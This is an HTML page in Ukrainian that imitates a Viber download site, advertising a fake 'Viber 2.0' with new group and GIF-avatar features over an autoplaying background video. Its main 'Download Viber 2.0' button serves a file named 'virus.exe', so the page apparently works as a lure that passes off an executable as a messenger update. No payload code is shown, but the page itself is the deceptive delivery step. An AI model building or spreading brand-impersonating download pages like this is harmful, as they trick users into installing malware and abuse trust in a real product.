<!DOCTYPE HTML>

<html lang="ua">

<head>
  <title>Viber 2.0</title>
  <meta charset="utf-8">
  <link rel="icon" href="icon.png">
  <style>
  html {
          overflow: hidden;
  }

  .head {
          color: #5F44CC;
          font-family: Verdana, Geneva, sans-serif;
          padding: 26px;
          left: 0;
          top: 0;
  }

  p {
          font-family: Tahoma, Geneva, sans-serif;
          font-size: 50px;
          max-width: 1500px;
          margin: 100px;
          position: relative;
          color: #fff
  }

  .a {
          font-family: Verdana, Geneva, sans-serif;
          font-size: 40px;
          border-radius: 100px;
          background: #31CC28;
          padding: 50px;
          text-decoration: none;
          position: relative;
          top: 400px;
          color: #fff;
          right: 60px;
  }

    a {
          font-family: Tahoma, Geneva, sans-serif;
          font-size: 30px;
          padding: 20px;
          color: #7444CC;
          position: relative;
   }

  a:focus {
        color: #C6BCE7;
  }

  .figna {
          right: -150px;
          color: #8d8d8d;
          font-size: 25px;
          font-family: Arial, Helvetica, sans-serif;
          text-decoration: none;
  }

  .video {
          position: relative;
  }

  .video_media {
          width: 600%;
          position: absolute;
          top: 0;
          height: auto;
          right: -1600px;
  }

  </style>
</head>

<body>
         <div class="head">
                <span style="position: relative; right: -20px; top: 5px; font-size: 75px;">Viber</span>
                <a class="figna" href="#">Blog</a>
                <a class="figna" href="#">Communities</a>
                <a class="figna" href="#">Security</a>
         </div>

         <div class="video">
         <video class="video_media" src="video.mp4" autoplay muted loop></video>
         </div>
         <center>
         <p style="position: relative; top: 400px; right: 50px;">Завантажте додаток Viber 2.0 і спілкуйтеся з друзями та рідними за допомогою відеозв'язку
         або  повідомленнями, з новим Viber тепер ви зможете полнітсю налаштовувати свої групи,
         а також тепер можна ставити на аватарку й фото групи гіф зображення :)</p>
         <a class="a" style="text-decoration: none;" download href="virus.exe">Завантажити Viber 2.0</a>
         <p style="color: #cccccc; position: relative; top: 700px; right: -200px;">Якщо ви знайшли проблему в Viber 2.0, то відправьте повідомлення про проблему нам</p>
         </center>
</body>

</html>